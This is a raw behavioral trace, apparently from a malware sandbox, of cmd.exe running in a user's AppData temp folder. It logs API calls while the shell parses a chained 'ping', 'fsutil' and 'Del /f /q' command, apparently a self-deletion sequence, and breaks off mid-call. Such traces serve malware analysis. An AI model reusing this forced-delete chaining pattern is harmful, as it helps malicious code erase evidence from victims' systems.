FreeEnvironmentStringsW (penv=0x2e22f8) returned 1 [0257.955] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0257.955] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0257.955] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0257.955] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0257.955] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0257.955] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0257.955] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0257.955] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0257.955] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0257.955] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0257.955] GetProcessHeap () returned 0x2d0000 [0257.955] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x7c) returned 0x2e5748 [0257.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0257.955] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x104, lpBuffer=0x2cf7f8, lpFilePart=0x2cf7f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x2cf7f4*="Temp") returned 0x39 [0257.955] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0257.955] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x2e17b0 [0257.956] FindClose (in: hFindFile=0x2e17b0 | out: hFindFile=0x2e17b0) returned 1 [0257.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2e17b0 [0257.956] FindClose (in: hFindFile=0x2e17b0 | out: hFindFile=0x2e17b0) returned 1 [0257.956] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0257.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x2e17b0 [0257.956] FindClose (in: hFindFile=0x2e17b0 | out: hFindFile=0x2e17b0) returned 1 [0257.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x2e17b0 [0257.956] FindClose (in: hFindFile=0x2e17b0 | out: hFindFile=0x2e17b0) returned 1 [0257.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0x2e17b0 [0257.956] FindClose (in: hFindFile=0x2e17b0 | out: hFindFile=0x2e17b0) returned 1 [0257.957] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x2e17b0 [0257.957] FindClose (in: hFindFile=0x2e17b0 | out: hFindFile=0x2e17b0) returned 1 [0257.957] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0257.957] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 1 [0257.957] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 1 [0257.957] GetProcessHeap () returned 0x2d0000 [0257.957] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4c58 | out: hHeap=0x2d0000) returned 1 [0257.957] GetEnvironmentStringsW () returned 0x2e4168* [0257.957] GetProcessHeap () returned 0x2d0000 [0257.957] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb5e) returned 0x2e57d0 [0257.957] FreeEnvironmentStringsW (penv=0x2e4168) returned 1 [0257.957] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6e5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0257.957] GetProcessHeap () returned 0x2d0000 [0257.957] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5748 | out: hHeap=0x2d0000) returned 1 [0257.957] GetProcessHeap () returned 0x2d0000 [0257.957] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x400e) returned 0x2e6338 [0257.958] GetProcessHeap () returned 0x2d0000 [0257.958] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xce) returned 0x2e2e60 [0257.958] GetProcessHeap () returned 0x2d0000 [0257.958] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e6338 | out: hHeap=0x2d0000) returned 1 [0257.958] GetConsoleOutputCP () returned 0x1b5 [0257.958] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6e4260 | out: lpCPInfo=0x4a6e4260) returned 1 [0257.958] GetUserDefaultLCID () returned 0x409 [0257.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a6e4950, cchData=8 | out: lpLCData=":") returned 2 [0257.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf938, cchData=128 | out: lpLCData="0") returned 2 [0257.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf938, cchData=128 | out: lpLCData="0") returned 2 [0257.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf938, cchData=128 | out: lpLCData="1") returned 2 [0257.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a6e4940, cchData=8 | out: lpLCData="/") returned 2 [0257.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a6e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0257.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a6e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0257.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a6e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0257.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a6e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0257.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a6e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0257.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a6e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0257.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a6e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0257.960] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a6e4930, cchData=8 | out: lpLCData=".") returned 2 [0257.960] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a6e4920, cchData=8 | out: lpLCData=",") returned 2 [0257.960] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0257.961] GetProcessHeap () returned 0x2d0000 [0257.961] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2e2f38 [0257.961] GetConsoleTitleW (in: lpConsoleTitle=0x2e2f38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0257.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0257.961] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0257.961] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0257.961] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0257.962] GetProcessHeap () returned 0x2d0000 [0257.962] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x400a) returned 0x2e6338 [0257.962] GetProcessHeap () returned 0x2d0000 [0257.962] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4008) returned 0x2ea350 [0257.962] GetProcessHeap () returned 0x2d0000 [0257.962] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2a) returned 0x2e3150 [0257.962] GetEnvironmentVariableW (in: lpName="s” & Del /f /q “", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0257.963] _wcsicmp (_String1="s” & Del /f /q “", _String2="CD") returned 16 [0257.963] _wcsicmp (_String1="s” & Del /f /q “", _String2="ERRORLEVEL") returned 14 [0257.963] _wcsicmp (_String1="s” & Del /f /q “", _String2="CMDEXTVERSION") returned 16 [0257.963] _wcsicmp (_String1="s” & Del /f /q “", _String2="CMDCMDLINE") returned 16 [0257.963] _wcsicmp (_String1="s” & Del /f /q “", _String2="DATE") returned 15 [0257.963] _wcsicmp (_String1="s” & Del /f /q “", _String2="TIME") returned -1 [0257.963] _wcsicmp (_String1="s” & Del /f /q “", _String2="RANDOM") returned 1 [0257.963] _wcsicmp (_String1="s” & Del /f /q “", _String2="HIGHESTNUMANODENUMBER") returned 11 [0257.963] GetProcessHeap () returned 0x2d0000 [0257.963] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e3150 | out: hHeap=0x2d0000) returned 1 [0257.963] GetProcessHeap () returned 0x2d0000 [0257.963] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ea350 | out: hHeap=0x2d0000) returned 1 [0257.963] GetProcessHeap () returned 0x2d0000 [0257.963] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4008) returned 0x2ea350 [0257.963] GetProcessHeap () returned 0x2d0000 [0257.963] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ea350 | out: hHeap=0x2d0000) returned 1 [0257.963] GetProcessHeap () returned 0x2d0000 [0257.963] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e6338 | out: hHeap=0x2d0000) returned 1 [0257.963] _wcsicmp (_String1="ping", _String2=")") returned 71 [0257.964] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0257.964] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0257.964] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0257.964] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0257.964] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0257.964] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0257.964] GetProcessHeap () returned 0x2d0000 [0257.964] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2e3150 [0257.964] GetProcessHeap () returned 0x2d0000 [0257.964] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2e17e8 [0257.964] GetProcessHeap () returned 0x2d0000 [0257.964] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2a) returned 0x2e31b0 [0257.965] GetProcessHeap () returned 0x2d0000 [0257.965] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2e0188 [0257.965] GetProcessHeap () returned 0x2d0000 [0257.965] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x10) returned 0x2df7a8 [0257.965] GetProcessHeap () returned 0x2d0000 [0257.965] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2c) returned 0x2e31e8 [0257.966] GetProcessHeap () returned 0x2d0000 [0257.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2e3220 [0257.966] _wcsicmp (_String1="fsutil", _String2=")") returned 61 [0257.967] _wcsicmp (_String1="FOR", _String2="fsutil") returned -4 [0257.967] _wcsicmp (_String1="FOR/?", _String2="fsutil") returned -4 [0257.967] _wcsicmp (_String1="IF", _String2="fsutil") returned 3 [0257.967] _wcsicmp (_String1="IF/?", _String2="fsutil") returned 3 [0257.967] _wcsicmp (_String1="REM", _String2="fsutil") returned 12 [0257.967] _wcsicmp (_String1="REM/?", _String2="fsutil") returned 12 [0257.967] GetProcessHeap () returned 0x2d0000 [0257.967] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2e3280 [0257.967] GetProcessHeap () returned 0x2d0000 [0257.967] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x16) returned 0x2e32e0 [0257.968] GetProcessHeap () returned 0x2d0000 [0257.968] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x66) returned 0x2e3300 [0257.969] GetProcessHeap () returned 0x2d0000 [0257.969] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2e3370 [0257.969] _wcsicmp (_String1="Del", _String2=")") returned 59 [0257.969] _wcsicmp (_String1="FOR", _String2="Del") returned 2 [0257.969] _wcsicmp (_String1="FOR/?", _String2="Del") returned 2 [0257.969] _wcsicmp (_String1="IF", _String2="Del") returned 5 [0257.969] _wcsicmp (_String1="IF/?", _String2="Del") returned 5 [0257.969] _wcsicmp (_String1="REM", _String2="Del") returned 14 [0257.969] _wcsicmp (_String1="REM/?", _String2="Del") returned 14 [0257.969] GetProcessHeap () returned 0x2d0000 [0257.969] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x58) returned 0x2e33d0 [0257.969] GetProcessHeap () returned 0x2d0000 [0257.970] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x10) returned 0x2df7c0 [0257.970] GetProcessHeap () returned 0x2d0000 [0257.970] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2d0808 [0257.971] GetProcessHeap () returned 0x2d0000 [0257.971] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x18) returned 0x2e3430 [0257.971] _get_osfhandle (_FileHandle=1) returned 0x4b0 [0257.971] _get_osfhandle (_FileHandle=1) returned 0x4b0 [0257.971] _get_osfhandle (_FileHandle=1) returned 0x4b0 [0257.971] GetFileType (hFile=0x4b0) returned 0x3 [0257.971] _get_osfhandle (_FileHandle=1) returned 0x4b0 [0257.971] GetFileType (hFile=0x4b0) returned 0x3 [0257.971] _dup (_FileHandle=1) returned 3 [0257.971] _close (_FileHandle=1) returned 0 [0257.971] _wcsicmp (_String1="Nul", _String2="con") returned 11 [0257.971] CreateFileW (lpFileName="Nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf79c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0257.971] _open_osfhandle (_OSFileHandle=0x4b0, _Flags=8) returned 1 [0257.971] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0257.972] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0257.972] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0257.972] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0257.972] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0257.972] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0257.972] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0257.972] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0257.972] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0257.972] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0257.972] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0257.972] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0257.972] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0257.972] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0257.972] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0257.972] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0257.972] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0257.972] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0257.972] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0257.972] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0257.972] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0257.972] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0257.972] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0257.972] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0257.972] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0257.972] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0257.973] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0257.973] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0257.973] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0257.973] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0257.973] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0257.973] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0257.973] _wcsicmp (_String1="ping", _String2="START") returned -3 [0257.973] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0257.973] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0257.973] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0257.973] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0257.973] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0257.973] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0257.973] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0257.973] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0257.973] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0257.973] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0257.973] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0257.973] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0257.973] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0257.973] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0257.973] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0257.973] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0257.973] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0257.973] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0257.973] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0257.973] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0257.973] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0257.973] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0257.973] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0257.973] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0257.973] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0257.973] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0257.973] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0257.974] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0257.974] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0257.974] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0257.974] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0257.974] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0257.974] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0257.974] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0257.974] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0257.974] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0257.974] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0257.974] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0257.974] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0258.005] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0258.005] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0258.005] _wcsicmp (_String1="ping", _String2="START") returned -3 [0258.005] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0258.005] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0258.005] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0258.005] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0258.005] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0258.005] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0258.005] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0258.006] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0258.006] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0258.006] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0258.006] _wcsicmp (_String1="ping", _String2="FOR") returned 10 [0258.006] _wcsicmp (_String1="ping", _String2="IF") returned 7 [0258.006] _wcsicmp (_String1="ping", _String2="REM") returned -2 [0258.006] GetProcessHeap () returned 0x2d0000 [0258.006] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x210) returned 0x2e3450 [0258.006] GetProcessHeap () returned 0x2d0000 [0258.006] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x36) returned 0x2d0ff0 [0258.006] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0258.006] GetProcessHeap () returned 0x2d0000 [0258.006] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x418) returned 0x2e4168 [0258.006] SetErrorMode (uMode=0x0) returned 0x0 [0258.006] SetErrorMode (uMode=0x1) returned 0x0 [0258.006] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e4170, lpFilePart=0x2cf0ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x2cf0ec*="Temp") returned 0x39 [0258.006] SetErrorMode (uMode=0x0) returned 0x1 [0258.007] GetProcessHeap () returned 0x2d0000 [0258.007] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e4168, Size=0x86) returned 0x2e4168 [0258.007] GetProcessHeap () returned 0x2d0000 [0258.007] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e4168) returned 0x86 [0258.007] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0258.007] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0258.007] GetProcessHeap () returned 0x2d0000 [0258.007] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x148) returned 0x2d1030 [0258.007] GetProcessHeap () returned 0x2d0000 [0258.007] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x288) returned 0x2e41f8 [0258.013] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e41f8, Size=0x14a) returned 0x2e41f8 [0258.013] GetProcessHeap () returned 0x2d0000 [0258.013] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e41f8) returned 0x14a [0258.013] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0258.013] GetProcessHeap () returned 0x2d0000 [0258.013] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe0) returned 0x2d1180 [0258.013] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2d1180, Size=0x76) returned 0x2d1180 [0258.013] GetProcessHeap () returned 0x2d0000 [0258.013] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2d1180) returned 0x76 [0258.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0258.014] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2cee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee68) returned 0xffffffff [0258.014] GetLastError () returned 0x2 [0258.015] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\ping", fInfoLevelId=0x1, lpFindFileData=0x2cee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee68) returned 0xffffffff [0258.015] GetLastError () returned 0x2 [0258.015] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0258.015] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2cee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee68) returned 0x2d1200 [0258.015] GetProcessHeap () returned 0x2d0000 [0258.015] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x2e3668 [0258.015] FindClose (in: hFindFile=0x2d1200 | out: hFindFile=0x2d1200) returned 